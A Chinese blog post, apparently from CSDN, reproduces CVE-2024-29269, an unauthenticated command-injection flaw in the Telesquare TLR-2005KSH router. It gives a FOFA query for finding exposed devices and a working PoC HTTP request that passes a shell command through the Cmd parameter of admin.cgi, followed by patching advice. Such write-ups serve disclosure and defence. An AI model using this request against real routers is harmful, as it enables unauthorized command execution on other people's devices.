Telesquare TLR-2005KSH路由器 RCE漏洞复现(CVE-2024-29269)

已于 2024-04-07 15:56:59 修改
阅读量691 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-04-07 15:56:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/137466784
版权

0x01 产品简介

Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款Sk 电讯Lte 路由器。

0x02 漏洞概述

Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经Cmd参数授权的情况下执行系统命令并获取服务器权限。

0x03 影响范围

1.0.0 < version < 1.1.4

0x04 复现环境

FOFA:app="TELESQUARE-TLR-2005KSH"

0x05 漏洞复现

PoC

GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls%20-la HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.55
Connection: close
Accept: */*
Accept-Encoding: gzip

0x06 修复建议 

关闭互联网暴露面或接口设置访问权限

官方已发布最新补丁,请升级至最新版本

0xSecl
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
订阅专栏
漏洞复现】京师心智心理健康测评系统MyReport.ashx存在敏感信息泄露
失心少年
03-21 165
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!漏洞链接:http://127.0.0.1/FunctionModular/PersonalReport/Ajax/MyReport.ashx?
漏洞复现Telesquare admin.cgi 远程代码执行漏洞(CVE-2024-29269)
qq_67810151的博客
04-07 437
Telesquare TLR-2005Ksh版本1.0.0和1.1.4存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经cmd参数授权的情况下执行系统命令,并获取服务器权限。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 384
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
复现CVE-2024-29269 某国外路由器RCE漏洞_72
fushuang333的博客
04-12 529
复现CVE-2024-29269 某国外路由器RCE漏洞,通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。
CVE-2024-29269Telesquare TLR-2005KSH路由器RCE漏洞复现 [附POC]
薛定谔嘚喵博客
04-11 165
Telesquare Tlr-2005Ksh是韩国Telesquare公司的Sk Telecom Lte路由器Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经Cmd参数授权的情况下执行系统命令并获取服务器权限。
Telesquare TLR-2005KSH路由器 RCE漏洞复现(CVE-2024-29269)(含批量验证poc)
2301_76224054的博客
04-18 455
Telesquare Tlr-2005Ksh是韩国Telesquare(Telesquare)公司的一款Sk电讯Lte(Lte)路由器Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经Cmd参数授权的情况下执行系统命令并获取服务器权限,
漏洞复现Telesquare TLR-2005Ksh 路由器 RCE漏洞
weixin_52204925的博客
03-19 522
免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
poc-swagger:[POC]昂首阔步
05-09
poc-swagger 这是一个Java 8项目。 运行:mvn spring-boot:run 访问Swagger-UI界面:
论文研究 - 口服病原体参与的促炎途径
05-27
牙龈卟啉单胞菌对口腔粘膜表达MMP-9的诱导主要取决于其关键内毒素,LPS,TLR4的参与以及激活Rac1和cPLA2涉及的MAPK,ERK和p38级联的激活。 ERK介导的cPLA2磷酸化在其与Rac1的膜移位中起重要作用,而Rac1的p38定位则...
行业分类-设备装置-从TLR4NF-κB通路探讨芪药鸡金粥对化疗后大鼠胃肠道紧密连接蛋白的影响.zip
08-24
行业分类-设备装置-从TLR4NF-κB通路探讨芪药鸡金粥对化疗后大鼠胃肠道紧密连接蛋白的影响.zip
stc-isp v6.88K
12-06
STC8H4K64TLR, STC8H3K64S4, STC8H3K64S2, STC8G2K64S4, STC8G2K64S2, STC8C2K64S4, STC8C2K64S2, STC8A8K64D4 STC8A2K64D4, STC8A8K64S4A12, STC8F2K64S4, STC8F2K64S2 4. 增加STC8C系列头文件 5. 主菜单增加...
stc-isp v6.88F
06-25
单片机开发下载工具软件带驱动包。如数字杀毒软件报毒请把其添加到白名单中,如有顾虑请自行到官网下载。... (增加STC8H4K64TLR系列) 5. 仿真驱动程序版本更新为v1.13 (解决单步偶尔会出现通讯中断的问题)
登录安全分析报告:小米官网注册
Explinks的博客
05-29 928
图形验证及交互验证方式的安全性到底如何?请看具体分析。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 993
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
导线防碰撞警示灯:高压线路安全保障
最新发布
dxzhkj888888的博客
05-30 269
同时,警示灯的反光材料也起到了至关重要的作用,无论是白天还是夜晚,都能将光线反射到最远的距离,让警示效果倍增。导线防碰撞警示灯也叫高压线太阳能警示灯、户外高压线路夜间红色闪光灯,以其独特的设计和卓越的性能,成为了电力安全领域的保障。在广袤的大地上,高压线路如同血脉般纵横交错,然而,在这看似平静的电力输送背后,却隐藏着不容忽视的安全隐患。而到了夜晚,警示灯便开始了它的使命。导线防碰撞警示灯的出现,使得那些驾驶超高车辆、操作超高施工机械的司机们,也在警示灯的提醒下,更加谨慎地行驶和操作,避免了可能发生的危险。
网络学习(九)|深入解析Cookie与Session:高级应用及安全实践
weixin_44435110的博客
05-28 667
通过本以上,后端开发人员可以深入了解Cookie和Session的高级应用、常见问题及其解决方案,有助于设计和实现高效、安全的会话管理系统。
内网安全-隧道搭建&穿透上线&内网穿透-nps自定义上线&内网渗透-Linux上线-cs上线Linux主机
rumil的博客
05-28 1503
nps内网穿透工具是一款轻量级、高性能、功能强大的内网代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用于访问内网网站、支付本地接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。一个轻量级、高性能、强大的内网穿透代理服务器,带有强大的web管理端。 内网渗透-CS上线Linux主机-Linux上线
peplink路由器
02-28
Peplink是一家专注于网络连接和路由技术的公司,他们提供了一系列高性能的路由器产品。Peplink路由器具有以下特点和功能: 1. 多WAN连接:Peplink路由器支持多个广域网(WAN)连接,可以同时使用多个互联网服务提供商的连接,实现负载均衡和故障转移。这样可以提高网络的可靠性和带宽利用率。 2.******用户或网络流量进行优先级和限制。这样可以确保关键应用程序的带宽需求得到满足,同时避免非关键应用程序占用过多带宽。 4. 冗余和故障转移:Peplink路由器支持冗余配置和故障转移,当一个连接出现故障时,可以自动切换到备用连接,确保网络的连通性和可用性。 5. 高级安全性:Peplink路由器提供了多种安全功能,包括防火墙、入侵检测和预防系统(IDS/IPS)、内容过滤等,可以保护网络免受恶意攻击和未经授权的访问。 6. 简化管理:Peplink路由器提供了直观的Web界面和中央管理系统,可以方便地配置和管理整个网络。同时,还支持远程监控和故障排除,简化了网络管理的工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值